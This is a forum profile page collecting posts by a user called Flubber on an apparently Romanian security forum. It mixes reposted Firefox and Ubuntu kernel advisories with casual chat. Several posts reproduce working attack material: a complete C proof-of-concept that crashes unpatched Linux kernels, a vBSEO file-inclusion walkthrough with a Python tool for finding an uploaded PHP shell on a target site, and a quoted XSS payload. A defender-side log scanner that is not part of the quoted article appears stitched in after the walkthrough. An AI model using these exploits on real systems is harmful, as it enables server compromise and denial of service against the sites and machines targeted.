
Flubber

Everything posted by Flubber

  1. That kind of thing doesn't help at all; all that should be given are hints for newbies. Direct solutions get you nowhere and you learn nothing from them; at most you consult the solutions posted on the internet after you've solved the mission yourself (that way you learn something new, review, or maybe see new techniques). Believe me, I did the same (in 40% of the missions) and learned (almost) nothing.
  2. Zero Day Initiative, which I posted about on the forum, but apparently the thread is no longer there.

ZDI-11-103: Mozilla Firefox JSON.stringify Dangling Pointer Remote Code Execution Vulnerability
Zero Day Initiative (http://www.zerodayinitiative.com/advisories/ZDI-11-103)
March 2, 2011

-- CVE ID: CVE-2011-0055
-- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- Affected Vendors: Mozilla
-- Affected Products: Mozilla Firefox
-- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10843. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within js3250.dll. In the JSON.stringify() call chain js_HasOwnProperty() is called with an invalid pointer. The pointer becomes invalid due to being unrooted and garbage collection occurring. Dereferencing this pointer allows a remote attacker to execute arbitrary code in the context of the user running the browser.

-- Vendor Response:
Mozilla has issued an update to correct this vulnerability. More details can be found at: MFSA 2011-03: Use-after-free error in JSON.stringify (http://www.mozilla.org/security/announce/2011/mfsa2011-03.html)

-- Disclosure Timeline:
2010-12-01 - Vulnerability reported to vendor
2011-03-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by: * regenrecht

Source: Full Disclosure: ZDI-11-103: Mozilla Firefox JSON.stringify Dangling Pointer Remote Code Execution Vulnerability
  3. Congratulations! Thanks! :sadface:
  4. The upgrade to 2.6.32-29 has already been done. Whoever has Ubuntu: update && upgrade.

[USN-1080-1] Linux kernel vulnerabilities (Ubuntu 10.04 LTS)

Details follow:

Thomas Pollet discovered that the RDS network protocol did not check certain iovec buffers. A local attacker could exploit this to crash the system or possibly execute arbitrary code as the root user. (CVE-2010-3865)

Vasiliy Kulikov discovered that the Linux kernel X.25 implementation did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3875)

Vasiliy Kulikov discovered that the Linux kernel sockets implementation did not properly initialize certain structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3876)

Vasiliy Kulikov discovered that the TIPC interface did not correctly initialize certain structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3877)

Nelson Elhage discovered that the Linux kernel IPv4 implementation did not properly audit certain bytecodes in netlink messages. A local attacker could exploit this to cause the kernel to hang, leading to a denial of service. (CVE-2010-3880)

It was discovered that multithreaded exec did not handle CPU timers correctly. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2010-4248)

Krishna Gudipati discovered that the bfa adapter driver did not correctly initialize certain structures. A local attacker could read files in /sys to crash the system, leading to a denial of service. (CVE-2010-4343)

Tavis Ormandy discovered that the install_special_mapping function could bypass the mmap_min_addr restriction. A local attacker could exploit this to mmap 4096 bytes below the mmap_min_addr area, possibly improving the chances of performing NULL pointer dereference attacks. (CVE-2010-4346)

It was discovered that the ICMP stack did not correctly handle certain unreachable messages. If a remote attacker were able to acquire a socket lock, they could send specially crafted traffic that would crash the system, leading to a denial of service. (CVE-2010-4526)

Dan Rosenberg discovered that the OSS subsystem did not handle name termination correctly. A local attacker could exploit this to crash the system or gain root privileges. (CVE-2010-4527)

Dan Carpenter discovered that the Infiniband driver did not correctly handle certain requests. A local user could exploit this to crash the system or potentially gain root privileges. (CVE-2010-4649, CVE-2011-1044)

[USN-1081-1] Linux kernel vulnerabilities (Ubuntu 10.10)

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well.

Details follow:

It was discovered that KVM did not correctly initialize certain CPU registers. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2010-3698)

Thomas Pollet discovered that the RDS network protocol did not check certain iovec buffers. A local attacker could exploit this to crash the system or possibly execute arbitrary code as the root user. (CVE-2010-3865)

Vasiliy Kulikov discovered that the Linux kernel X.25 implementation did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3875)

Vasiliy Kulikov discovered that the Linux kernel sockets implementation did not properly initialize certain structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3876)

Vasiliy Kulikov discovered that the TIPC interface did not correctly initialize certain structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3877)

Nelson Elhage discovered that the Linux kernel IPv4 implementation did not properly audit certain bytecodes in netlink messages. A local attacker could exploit this to cause the kernel to hang, leading to a denial of service. (CVE-2010-3880)

Dan Rosenberg discovered that the ivtv V4L driver did not correctly initialize certain structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-4079)

Dan Rosenberg discovered that the semctl syscall did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-4083)

It was discovered that multithreaded exec did not handle CPU timers correctly. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2010-4248)

Nelson Elhage discovered that Econet did not correctly handle AUN packets over UDP. A local attacker could send specially crafted traffic to crash the system, leading to a denial of service. (CVE-2010-4342)

Tavis Ormandy discovered that the install_special_mapping function could bypass the mmap_min_addr restriction. A local attacker could exploit this to mmap 4096 bytes below the mmap_min_addr area, possibly improving the chances of performing NULL pointer dereference attacks. (CVE-2010-4346)

Dan Rosenberg discovered that the OSS subsystem did not handle name termination correctly. A local attacker could exploit this to crash the system or gain root privileges. (CVE-2010-4527)

Dan Carpenter discovered that the Infiniband driver did not correctly handle certain requests. A local user could exploit this to crash the system or potentially gain root privileges. (CVE-2010-4649, CVE-2011-1044)

As for Linux Kernel <= 2.6.37:

/* Linux Kernel <= 2.6.37 local kernel DoS (CVE-2010-4165)
 * =======================================================
 * A divide by 0 error occurs in tcp_select_initial_window
 * when processing user supplied TCP_MAXSEG facilitating a
 * local denial-of-service condition (kernel oops!) in all
 * Linux Kernel 2.6.x branch (2.6.37 & below). This issue
 * can be triggered easily with a call to setsockopt() on
 * a listening network socket and then establishing a TCP
 * connection to the awaiting socket.
 *
 * -- prdelka
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset */
#include <unistd.h>      /* fork, sleep */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/tcp.h>

int main()
{
    int optval, optlen, ret, sd, sd2, pid;
    char *host = "localhost";
    struct sockaddr_in locAddr;
    struct sockaddr_in servAddr;
    struct sockaddr_in dstAddr;

    printf("[ Linux Kernel tcp_select_initial_window divide by 0 DoS\n");

    /* Listening socket on 60000, and a destination address pointing back at it. */
    sd = socket(AF_INET, SOCK_STREAM, 0);
    memset(&servAddr,0,sizeof(servAddr));
    memset(&dstAddr,0,sizeof(dstAddr));
    servAddr.sin_family = AF_INET;
    servAddr.sin_port = htons(60000);
    servAddr.sin_addr.s_addr = INADDR_ANY;
    dstAddr.sin_family = AF_INET;
    inet_aton("127.0.0.1", &dstAddr.sin_addr);
    dstAddr.sin_port = htons(60000);

    if((bind(sd,(struct sockaddr *)&servAddr,sizeof(struct sockaddr))) == -1){
        printf("[ Cannot bind listener service\n");
        exit(-1);
    }
    listen(sd,4);

    /* A patched kernel rejects the tiny MSS; an unpatched one accepts it. */
    optval = 12;
    ret = setsockopt(sd, IPPROTO_TCP, TCP_MAXSEG, &optval, sizeof(optval));
    if(ret==0) {
        printf("[ System is not patched against CVE-2010-4165\n[ Goodnight, sweet prince.\n");
        socklen_t sin_size = sizeof(struct sockaddr_in);
        switch(pid = fork()) {
            case 0:
                sd = accept(sd,(struct sockaddr *)&locAddr,&sin_size);
                sleep(3);
            default:
                sd2 = socket(AF_INET, SOCK_STREAM, 0);
                connect(sd2, (struct sockaddr *)&dstAddr, sizeof(dstAddr));
                sleep(3);
        }
    }
    printf("[ System is patched, no dreams for this prince\n");
    return 0;
}

Sources (in order):
1] Full Disclosure: [USN-1080-1] Linux kernel vulnerabilities
2] Full Disclosure: [USN-1081-1] Linux kernel vulnerabilities
3] Linux Kernel <= 2.6.37 Local Kernel Denial of Service
  5. I agree. Also, at 6 in the morning I was racking my brains and all I could get out was:

CrackMe-rstcenter#PictureBox1.ImagePictureBox1Form2OStraduieste-te mai mult , pentru ca ...Form3Ai reusit !#CrackMe.Resou?rces EAX=0B71B600 Stack SS:[0012E4C0]=01692678, (ASCII "îþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþEAX=0B71B600

Some idiotic notes, but I noticed something, and I had been trying some random stuff: CrackMe-rstcenter, more precisely -rstcenter. If I had started with trial and error (daatdraq-rstcenter // gigiparleala-rstcenter etc.) maybe I would have managed something. Thanks for the crackme; truth be told, a more detailed analysis of the executable was needed and maybe I would have realized it was made in .NET. P.S.: The notes were made after loading (ugh, sounds awkward) the executable into notepad (yes, notepad ftw) and into a hex editor -- see 'Form3 Ai reusit!'; I was hoping for a bypass to Form3.
  6. Ubuntu Security Notice. It concerns Ubuntu 6.06 LTS, fairly old, but if anyone is still using it (reason: a low-performance system?), an update & upgrade is recommended.

A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
linux-image-2.6.15-55-386 2.6.15-55.93
linux-image-2.6.15-55-686 2.6.15-55.93
linux-image-2.6.15-55-amd64-generic 2.6.15-55.93
linux-image-2.6.15-55-amd64-k8 2.6.15-55.93
linux-image-2.6.15-55-amd64-server 2.6.15-55.93
linux-image-2.6.15-55-amd64-xeon 2.6.15-55.93
linux-image-2.6.15-55-hppa32 2.6.15-55.93
linux-image-2.6.15-55-hppa32-smp 2.6.15-55.93
linux-image-2.6.15-55-hppa64 2.6.15-55.93
linux-image-2.6.15-55-hppa64-smp 2.6.15-55.93
linux-image-2.6.15-55-itanium 2.6.15-55.93
linux-image-2.6.15-55-itanium-smp 2.6.15-55.93
linux-image-2.6.15-55-k7 2.6.15-55.93
linux-image-2.6.15-55-mckinley 2.6.15-55.93
linux-image-2.6.15-55-mckinley-smp 2.6.15-55.93
linux-image-2.6.15-55-powerpc 2.6.15-55.93
linux-image-2.6.15-55-powerpc-smp 2.6.15-55.93
linux-image-2.6.15-55-powerpc64-smp 2.6.15-55.93
linux-image-2.6.15-55-server 2.6.15-55.93
linux-image-2.6.15-55-server-bigiron 2.6.15-55.93
linux-image-2.6.15-55-sparc64 2.6.15-55.93
linux-image-2.6.15-55-sparc64-smp 2.6.15-55.93

After a standard system update you need to reboot your computer to make all the necessary changes.

Details follow:

Tavis Ormandy discovered that the Linux kernel did not properly implement exception fixup. A local attacker could exploit this to crash the kernel, leading to a denial of service. (CVE-2010-3086)

Dan Rosenberg discovered that the Linux kernel TIPC implementation contained multiple integer signedness errors. A local attacker could exploit this to gain root privileges. (CVE-2010-3859)

Dan Rosenberg discovered that the Linux kernel X.25 implementation incorrectly parsed facilities. A remote attacker could exploit this to crash the kernel, leading to a denial of service. (CVE-2010-3873)

Vasiliy Kulikov discovered that the Linux kernel X.25 implementation did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3875)

Vasiliy Kulikov discovered that the Linux kernel sockets implementation did not properly initialize certain structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3876)

Nelson Elhage discovered that the Linux kernel IPv4 implementation did not properly audit certain bytecodes in netlink messages. A local attacker could exploit this to cause the kernel to hang, leading to a denial of service. (CVE-2010-3880)

Dan Rosenberg discovered that the SiS video driver did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-4078)

Dan Rosenberg discovered that the RME Hammerfall DSP audio interface driver did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-4080, CVE-2010-4081)

Dan Rosenberg discovered that the semctl syscall did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-4083)

James Bottomley discovered that the ICP vortex storage array controller driver did not validate certain sizes. A local attacker on a 64bit system could exploit this to crash the kernel, leading to a denial of service. (CVE-2010-4157)

Dan Rosenberg discovered that the Linux kernel L2TP implementation contained multiple integer signedness errors. A local attacker could exploit this to crash the kernel, or possibly gain root privileges. (CVE-2010-4160)

Via RSS.
  7. Epic. A typical manipulation video, the American "dream":
  8. Exactly! HBGary. I didn't know who the hell they were either, until I read (almost) the whole article received via RSS; it's epic. It's exactly what the old school members of the scene described. Remember? And I quote:

That the Anonymous folks used an SQLi vulnerability in the CMS to do that defacement is no excuse for a 'super security expert' working at a company that has contracts with the FBI, NSA etc. The even more interesting part is when they practice social engineering on one of the employees, who took the bait and DISABLED THE FIREWALL, allowing SSH access FROM ANYWHERE. Fail.

From this article: Source: Full Disclosure: What the f*** is going on? (quite funny how people like that get angry)

Full article (3 pages): Anonymous speaks: the inside story of the HBGary hack

// LE: I forgot to mention that the mega security expert was charging huge sums of money for some simple NMAP scans!
  9. A thread from 2008! Don't raise the dead, because no, it doesn't mean Jesus is coming to Earth, it means they'll turn into zombies!
  10. You know the saying 'Râde ciob de oală spartă' (the pot calling the kettle black)? That's about what you're applying right now. With this crappy thread that wants to be an elaborate 'prank', you've wasted another 2 minutes of my life (I had to write this post too, didn't I?). As for asking for advice, there's nothing wrong with that; maybe you want more opinions from everywhere to reach a final result, but did you put your wild and lonely neuron to work to take that conclusion into account? Not really! Bad, bad, bad!
  11. Kinda old.

vBulletin – Not So Secure Anymore
3rd August 2010 - by MaXe
Tags: Exploit, WebApps

Some time ago, an LFI vulnerability within vBSEO was discovered, which allowed an attacker to include locally hosted files. The challenge, when confronted with an LFI vulnerability, is to leverage it into executing arbitrary code of our choosing. Many vBulletin installations are using this addon to improve their SEO drastically, however many of them are not fully patched, which is good for us, but very bad for those that host a vulnerable web application.

In many cases, it is not a piece of cake to exploit LFI, aka Local File Inclusion, vulnerabilities due to the fact that it may not be easy to upload content to the target server. In some scenarios, it is possible to inject PHP code into access logs and in others, it is possible to include binary MySQL files. It should be noted though, that it is usually impossible to always know where these files are stored. Of course, we can guess where these files are stored, but we may still not be sure how the server is configured and whether this approach will work.

Reconnaissance

First, we need to determine whether our target is vulnerable or not. This can be done by requesting to include a local script in the following manner:

http://our-target.tld/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html

Please note that some installations may appear to be vulnerable even though they're not. From our basic check above, we would like to test whether our target really is vulnerable to Local File Inclusions. We do this by creating a small txt file with 'phpinfo()' in it which we will upload to our target via the attachment manager.

Some vBulletin installations store attachments locally, which can be abused in this case to include a shell or similar malicious code IF we know the physical location of our file and if there's a vulnerability which allows us to do that.

Exploitation

In order to find the physical location of our uploaded file we need to find the attachment directory and scan through the subdirectories. I've created a small tool for this task, which is far from complete but it does work on some hosts. The basic version is as follows:

#!/usr/bin/python
# (InterN0T ASCII-art banner omitted; it did not survive extraction)
# --------------------------------------------------------
# Title: vBSEO LFI Assistant Tool
# Author: MaXe
# Site: http://www.intern0t.net
#
# Description: 1) Checks whether the vBSEO installation
#              is patched or not. 2) Attempts to find
#              the physical location of an uploaded
#              attachment phile. (PHP Shell)
#
# Version: 2.1.4 - Reversed Algorithm - Basic Version
#
# License: -- Attribution-ShareAlike 3.0 Unported --
#          http://creativecommons.org/licenses/by-sa/3.0/
#
# Notes: The basic version does not contain multi-
#        threading nor is it able to search through
#        multiple sub directories which the advanced
#        version will be able to.
#        Please note, that this tool does not work on
#        all types of hosts and you should therefore
#        modify this script to your own needs.
#
# Disclaimer: This tool is meant for ethical purposes only.

# Import the appropriate libraries. (Python 2: httplib, raw_input, print statement)
import os
import re
import httplib
import sys

# Clear the screen in a sufficient way.
if(os.name) == "posix":
    os.system("clear")
elif(os.name) == "nt":
    os.system("cls")
else:
    print "[!] Cannot clear screen automatically.\n"

print "File Finder by MaXe from InterN0T.net\n\n"

# Get user-input and define global variables.
target = raw_input("Enter a domain to scan: ")
file_match = raw_input("Enter a keyword to look for: ")
main_dir = ["attach","attachment","attachments","download"]
poss_main_dir = []
sub_dir = []

# Strip away http and https from the target variable.
striptarget = re.compile('(http://|https://)')
newtarget = striptarget.sub('', target)

# Perform a simple LFI to check whether the target is vulnerable or not.
conn = httplib.HTTPConnection(newtarget, 80)
print " [*] Checking if site appears to be vulnerable."
conn.request("GET", "/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html")
resp = conn.getresponse()

# If the response code is 200 OK, check if the file really was included.
if resp.status == 200:
    print "[+] Site is responding, this is good."
    if re.search("(Enter text...)", resp.read()):
        print ">> The site appears to be vulnerable!"
    else:
        print "[!] The site appears to be patched. (unknown error)"
elif resp.status == 404:
    print "[!] The site appears to be patched. (404)"

# Search for attachment directories
for value in main_dir[0:]:
    conn = httplib.HTTPConnection(newtarget, 80)
    print " [*] Trying: http://%s/%s/" % (newtarget,value)
    conn.request("HEAD", "/%s/" % value)
    resp = conn.getresponse()
    # If the response code is 403 (Forbidden), set a new variable and continue.
    if resp.status == 403:
        print "[+] Directory found: /%s/" % value
        if poss_main_dir == []:
            poss_main_dir = ["%s" % value]
        else:
            poss_main_dir += ["%s" % value]
    conn.close()

if poss_main_dir == []:
    print "[!] No directories were found, exiting."
    sys.exit()

# Search for possible sub directories
for value in poss_main_dir:
    i = 0
    print " [*] Trying subdirs within: http://%s/%s/" % (newtarget,value)
    while i <= 9:
        conn = httplib.HTTPConnection(newtarget, 80)
        conn.request("HEAD", "/%s/%s/" % (value,i))
        resp = conn.getresponse()
        if resp.status == 403:
            print "[+] Sub Directory found: /%s/%s/" % (value,i)
            found = "%s/%s" % (value,i)
            if sub_dir == []:
                sub_dir = ["%s" % found]
            else:
                sub_dir += ["%s" % found]
        i=i+1
        conn.close()

if sub_dir == []:
    print "[!] No sub directories were found, exiting."
    sys.exit()

# Search all the sub directories found for our phile
for value in sub_dir[0:]:
    i = 99
    print " [*] Trying to find our file within: /%s/" % value
    while i >= 0:
        conn = httplib.HTTPConnection(newtarget, 80)
        conn.request("GET", "/%s/%s.attach" % (value,i))
        resp = conn.getresponse()
        if resp.status == 200:
            print "[+] File found, does it match our keyword? >>%s" % file_match
            if re.search("(%s)" % file_match, resp.read()):
                print ">> File contains our keyword!"
                print "Part URL: /%s/%s.attach" % (value,i)
                print "Full URL: http://" + newtarget + "/%s/%s.attach \n" % (value,i)
                sys.exit(0)
        i=i-1
        conn.close()

# Don't forget, that this script can be used for more than one thing.

Source: vBulletin – Not So Secure Anymore
Author: MaXe
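As an added defender-side example (not part of the quoted article or of MaXe's tool), the following Python 3 script scans access-log lines for the two request patterns the walkthrough above produces: the vbseourl inclusion probe against vbseo.php, and the sequential <dir>/<n>/<m>.attach enumeration. The log lines, client addresses and threshold are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs, unquote

# Combined access-log format; the sample lines further down are constructed for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Directory names the article's scanner probes, and the "<dir>/<n>/<m>.attach" shape it requests.
ATTACH_DIRS = ("attach", "attachment", "attachments", "download")
ATTACH_PROBE_RE = re.compile(r"^/(%s)/\d+/\d+\.attach$" % "|".join(ATTACH_DIRS))


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify_vbseo_request(path):
    """Label a request path as 'lfi-attempt', 'attach-probe' or None."""
    parts = urlsplit(path)
    if parts.path.endswith("/vbseo.php"):
        qs = parse_qs(parts.query)
        if qs.get("vbseoembedd") == ["1"] and "vbseourl" in qs:
            url = unquote(qs["vbseourl"][0])  # second decode catches double-encoded traversal
            # A rewritten vBSEO URL is a forum-relative name (e.g. threads/42-title.html);
            # a filesystem-style path or any "../" segment is the inclusion probe.
            if url.startswith(("./", "../", "/")) or "../" in url:
                return "lfi-attempt"
    if ATTACH_PROBE_RE.match(parts.path):
        return "attach-probe"
    return None


def scan(lines, probe_threshold=5):
    """Return findings as (ip, label, detail, status) tuples.

    Each inclusion probe is reported on its own. .attach requests are counted per
    client and reported once the count reaches probe_threshold, because the tool
    walks 99.attach down to 0.attach inside every candidate directory.
    """
    findings = []
    probes = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify_vbseo_request(rec["path"])
        if label == "lfi-attempt":
            findings.append((rec["ip"], label, rec["path"], rec["status"]))
        elif label == "attach-probe":
            probes[rec["ip"]] += 1
    for ip, n in probes.items():
        if n >= probe_threshold:
            findings.append((ip, "attach-enumeration", "%d .attach requests" % n, None))
    return findings


# Constructed sample log: one scanner run from 203.0.113.7 mixed with normal traffic.
SAMPLE_LOG = [
    '198.51.100.2 - - [03/Aug/2010:10:00:00 +0000] "GET /vbseo.php?vbseoembedd=1&vbseourl=threads/42-hello.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [03/Aug/2010:10:00:01 +0000] "GET /vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html HTTP/1.1" 200 1234 "-" "Python-urllib"',
    '203.0.113.7 - - [03/Aug/2010:10:00:02 +0000] "HEAD /attachments/ HTTP/1.1" 403 0 "-" "Python-urllib"',
    '203.0.113.7 - - [03/Aug/2010:10:00:03 +0000] "HEAD /attachments/3/ HTTP/1.1" 403 0 "-" "Python-urllib"',
] + [
    '203.0.113.7 - - [03/Aug/2010:10:00:%02d +0000] "GET /attachments/3/%d.attach HTTP/1.1" 404 0 "-" "Python-urllib"' % (4 + k, 99 - k)
    for k in range(6)
] + [
    '198.51.100.9 - - [03/Aug/2010:10:00:30 +0000] "GET /forum/index.php HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
]


def demo():
    return scan(SAMPLE_LOG)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On the constructed log this reports exactly two findings, both for 203.0.113.7: the ieprompt.html inclusion probe and the six-request .attach enumeration; the legitimate vbseourl=threads/... rewrite is not flagged.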
  12. You have a PM. Thanks 4 the challenge.
  13. It hasn't gone to dust at all; whoever wants to learn ASM and RE has to know English (whether they like it or not). Now, in my opinion, for beginners (like me) it would have been good if someone explained (in terms everyone can understand) how the CPU works (including registers, the level 1 and level 2 caches, the arithmetic logic unit, how it looks up RAM through the data bus, how exactly the stack works and so on), because these are basic notions, and you have to understand them since the CPU is what returns the values you see in the debugger, with ASM meaning all the 'commands' like JMP, CMP, SUB, ADD etc. Now I don't know how many people would be interested in something like that, because they'll say 'yes, but I don't give a damn that the CPU has an ALU and does 5,000,000,000,000,000,000 (not sure) calculations per second just to show me an "X" in the top bar of the pr0n window'. As I said before, it depends on each person, whether they also want to know what happens 'under the hood'. // LE: another video showing how a crack is made for the (fairly old -- release date: 1999; lul) game Caesar 3, but it shows the same principle phantomas90 used.
  14. "Well, at least "><script>alert(/XSS/)</script> works great: http://img6.imagebanana.com/img/4tyst18d/one.png http://img6.imagebanana.com/img/wh9zwmc6/two.png Thx to Friedrich Hausberger for his mail to FD ck" Source: Full Disclosure: [Google Chrome Browser] Google Mail Checker Plus: JavaScript Code Execution
  15. May you live a thousand years!
  16. Very interesting. Thank you. On topic: at first I also thought he was talking about the subconscious and how it 'dictates' to each person according to their characteristics, but when I read that it can't be found physically, it broke my heart in two. Therefore, what you can't see but is present in someone is, as was mentioned, temperament, character, personality, all of them influenced by the society and environment they live in. If you think about it, and I might be saying something stupid (so what), even temperament, characteristics and so on are the result of neural networks (in continual "change" -- that's why we sometimes "change" for a period of time, when (if you've noticed) we like something in particular about someone and tend to copy it into our own character (that's how some people become snobs)); how you react to certain situations (love, hate and so on) is the result of substances released by your brain and spread through the heart (that's roughly how it gets through the whole system). As I said, I might be talking nonsense; I'd really ask someone to correct me or raise objections (with arguments); your professor really piqued my curiosity.
  17. http://www.sendspace.com/file/v74wwm

For the client (game), a simple bash script:

#!/bin/bash
echo "Starting client."
java -jar MinecraftSP.jar

^ you need java installed:

sudo apt-get update
sudo apt-get install sun-java6-jre sun-java6-plugin

For the server:

#!/bin/bash
echo "Starting server."
java -Xmx1024M -Xms1024M -jar minecraft_server.jar nogui

Run it once, then type "stop" after it has finished generating the map and loading the resources. Some files will then be created in the folder, among them "server.properties". Edit it:

#Minecraft server properties
#Wed Feb 16 23:49:36 EET 2011
level-name=world
hellworld=false
spawn-monsters=true
online-mode=false
spawn-animals=true
max-players=20
server-ip=IP-UL SERVER-ULUI
pvp=false
server-port=25565

See what the differences are; I don't remember what the original looked like. Have fun! // The server is only needed if you want to play with someone else (multiplayer); with the client alone you can play singleplayer.
  18. It's a kind of ... Diablo, I could say (that's saying a lot, but you get the idea): you can destroy trees to get wood, with wood and stone you make yourself a sword (a.k.a. CRAFTING), and so on; you make these decisions during the day because when night falls the zombies come out to kill (literally). I played for an hour and had 2 crashes; I run it on Ubuntu 10.04.2 LTS; the third time I closed Pidgin, Akregator etc. and had no more problems. A nice game, I'll tear into it again tonight, but still, to build a whole CPU (with ALU) in such a game, and the memory (RAM) separately, without including the one reserved for the registers? That guy is talented, he knows them like the back of his hand xD.
  19. ... words? There are none. http://www.youtube.com/watch?v=uIhdP9ylRxE I mean... WHAT THE 0xFFFFFFFF?
  20. 2 ugly ones.

Update & package upgrade:

sudo apt-get update
sudo apt-get upgrade
sudo apt-get clean
sudo apt-get autoclean
sudo apt-get autoremove
sudo shutdown -r 0 -- restart

^ or: sudo reboot

Received via RSS
1] http://seclists.org/fulldisclosure/2011/Feb/313
2] http://seclists.org/fulldisclosure/2011/Feb/329
  21. http://inregistrari.antena3.ro/view-In_gura_presei_cu_Mircea_Badea-5.html More precisely: http://inregistrari.antena3.ro/view-15_Feb-2011-In_gura_presei_cu_Mircea_Badea-5.html From minute 37:08. A dose of laughter.
  22. Very good experiment, congratulations. I hope everyone learned something; still, it's sad to see how people write comments on various blogs: And others of the same kind, wasting their time without truly learning anything, something that would be useful to them and would keep their passion (assuming they have one; that's why they're there, to satisfy it) burning.
  23. Looking forward to many more. Lena is awesome!
  24. Mask: 255.255.255.0, not 255.255.252.0! Leave lo at its default (loopback); modify only eth0 and try again. As for the UPC modem, do you have a sheet with IPs (static ones, which don't change on restart) and netmask/DNS servers, or do you have a username and password like at RDS, where you're assigned a dynamic IP (after reconnecting you get a different IP)? Because from the picture, you seem to have a static one.
  25. Via the command "sudo su", then type your password.